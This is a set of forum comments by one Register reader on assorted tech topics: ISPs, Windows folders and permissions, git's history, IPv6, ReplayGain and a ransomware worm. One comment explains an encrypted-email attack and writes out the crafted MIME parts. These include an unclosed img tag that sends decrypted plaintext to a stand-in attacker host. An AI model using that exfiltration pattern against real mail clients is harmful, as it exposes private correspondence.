Posts by Havin_it 1196 posts • joined 1 May 2008
I bailed from Pipex when Tiscali got it, that was never going to go well. To... Demon! Who proceeded to be borged by THUS -> C&W -> Vodafone. The Demon branding was upheld for a while and only finally binned a couple of years ago. Voda have generally stayed out of my way, so I've stayed put. In the way of these things, though, I expect I'll be subscribed to Disney Broadband before long :/
To my mind, however, Microsoft hit a high point for event audio with Windows 95. Subsequent releases of Windows have never reached such glorious levels of gratuitous audio; indeed, the startup and shutdown sounds these days are little more than clicks or bips.
How dare you overlook that Vista's "soundscapes" were imagineered by bleedin' Robert Fripp?
People gonna forget how rock'n'roll MICROS~1 used to be ;)
If you're on a multi-user machine, ensuring "your" stuff is insulated by the correct file permissions by default is valuable: I tried making a "personal" folder under C:\ (which last I looked is world-writeable by default - WTF?!) but ensuring the permissions were set to propagate properly was a screaming nightmare. Windows permissions editing ... shudder.
I stopped using [user]\Documents when ransomware became a thing, as this would likely be a default target. The weird symlinking shenanigans to which Documents and its ilk are subject make them problematic for doing backups as well.
As for AppData, I've never grokked the philosophical distinction between Local/LocalLow/Roaming, and it's pretty clear app devs don't either. I never know which one I'll find an app's settings in, let alone why. Some even use more than one of them(?)
At least the FOSS apps can be relied upon to ignore all of them and create a nice predictable [user]\.[appname] folder :)
As I recall, the main target of Linus's anger at the time was Andrew Tridgell, for coming out with the reverse-engineered BK client that provoked BK's owner to withdraw the free-beer client license for kernel devs. If git was named for any one person at that time it was probably Tridge.
However, the very swift appearance of git in the wake of BK's move did make me wonder whether Linus had already been working towards dumping BK for some time, having tacitly acknowledged the complaints from many around him about the risks of adopting it in the first place.
Nah. All the downvotes in the world don't tell the poster that throwing around homophobic slurs (thanks for the repro, @TonyJ) is not OK with the Reg. For a lot of such specimens it only emboldens them. Nuking their post (with presumably a ban-warning given behind the scenes) tells them they're in a place that won't stand for that shit.
to the unhappy days of early-Noughties wifi adapter purchasing for Linux, where not just white-box jobs but most big brands were prone to having their innards completely re-jigged without so much as a telltale hardware rev to warn buyers of its now paperweight status. Traumatic.
@James Hughes 1 if you're still hanging around, is there any way to identify the faulty boards? Are any steps being taken to withdraw them from sales channels? (I don't remember seeing anything about this in the article, although that was a good 5 minutes ago now #NanaMoon)
Someone (possibly here yesterday) explained it thus: The attacker sends a crafted message with three MIME parts to it:
Part 1 (HTML)
<img src="http://badguyserver.cock/readmyplaintext.php?plaintext=
Part 2 (PGP / S/MIME)
[Previously-intercepted encrypted message]
Part 2 (HTML)
"/>
The silly mail client then glues all three into a single HTML part for display, and if it's REALLY silly it also goes right ahead and fetches the image, which passes the plaintext to $badguyserver in the URL (or as many characters thereof as the system allows for a URL string).
Hope I have that right; for some reason I'm loath to grace the vanity vuln-site with a click.
My phone's data connection goes through the cabinet as well? Damn. I should try to get them to route mine through the cabinet near my mum's place, I always get better speeds there.
And if the problem's in the cabinet, how much help is the Windows manual going to be?
At the moment (as far as I understand it) there is a sizeable difference in the compliance burden for PCI DSS between credit-card terminals that connect via dialup vs over the internet. To wit, terminal on dialup = can just self-certify; terminal over IP = have to get whole network audited regularly.
Doesn't moving to VoIP mean then that every bugger'll have to get audits done? Or will the exemption apply to it as well? Penny-pinching minds demand to know.
>A pox on it. We need IPv7 - just add another octet at the start of IPv6..
Couldn't we add one onto IPv4 instead and keep the rest of it the same? Then the hard-won skills of a multitude of consumer grannies (and me) could be transferred and nobody has to play how-many-colons bingo with that ridiculously opaque address scheme. Worked pretty well when we needed more phone numbers, amirite?
Wanted to mention you can also add ReplayGain tags (both track and album) to FLAC files, the command-line app "metaflac" can do it. My player supports it, but YMMV.
The loudness issue used to drive me mad on my phone, but after much study I managed to patch the old Android (ICS) Music app to support ReplayGain on MP3s.
Only problem was when Jelly Bean came along and I recompiled the app, it now has "gapless playback" (i.e. a slight crossfade/segue) which when fading from a song with lots of gain applied to one with none or negative gain, there tends to be a split-second burst of EXTREME LOUDNESS until the equalizer adjusts it to where it should be for the next track. I must try to fix this at some point but I fear by then the AOSP app will be abandonware :(
Mm, I wondered the same. Not sure the CMD shell can even do that on the host VM all that easily, let alone reaching back through the tubes and doing it to the VNC client's host machine.
Not to mention that if Hide Extensions is enabled (as has been default for quite some time), the mark might wonder why the file *has* a .TXT extension showing?
Now you could name it "Passwords.bat" but the icon would still be wrong. Worth a try would be creating the batchfile elsewhere and placing on the Desktop a shortcut to it, which IIRC you can change the icon of the shortcut.
But I'd still like that recipe for how this batchfile is pwning the intruder's machine. Still with us, OP?
Icon: closest available to "chinny reckon".
(in a couple case I even got a "recipient does not exist" response)
Now that *should* be enough to see action taken by their (the ISP's) TLD registry, as it violates RFCs, but I imagine for most of them this is equally fruitless.
What you can do however is report the offending IP (and in some cases the ISP's whole IP range if there is enough evidence of endemic misuse) to various spam blacklists (there are many). Then at least you're hopefully reducing the pain for others.
I'm reading through the Cisco analysis as I speak, but I'm not yet seeing what's the excuse for being vulnerable to this.
Seems that it
(1) Spreads through unsecured SMB ports
Well what the fuck retard has their MSNet ports out there waving in the breeze of the general Internet in this day and age, FFS? I mean even MS don't sell you an OS any more that does such stupid things OOTB.
(2) Drops a binary, msseseccexxxesexypoo.exe (or something)...
Well how does it drop it and execute it without a by-your-leave? What browser/email client is allowing that to happen, because it doesn't magically happen without a parent vuln or colossally bad design decision to enable it.
I've only skimmed this info so far but please, someone, let me know if I can get this without having my SMB ports open to the WAN and/or ignoring some permutation of Windows/browser/emailer that won't shout at me "UR ABOUT TO RUN A PROGGY OFF TEH INTERNET IT MITE BE BAD ACTULY ITS PROLLY BAD Y/N" prior to executing a downloaded binary (which, Christ, Windows itself actually does a pretty good job of doing lately).
The Register - Independent news and views for the tech community. Part of Situation Publishing
Join our daily or weekly newsletters, subscribe to a specific section or set News alerts
Subscribe
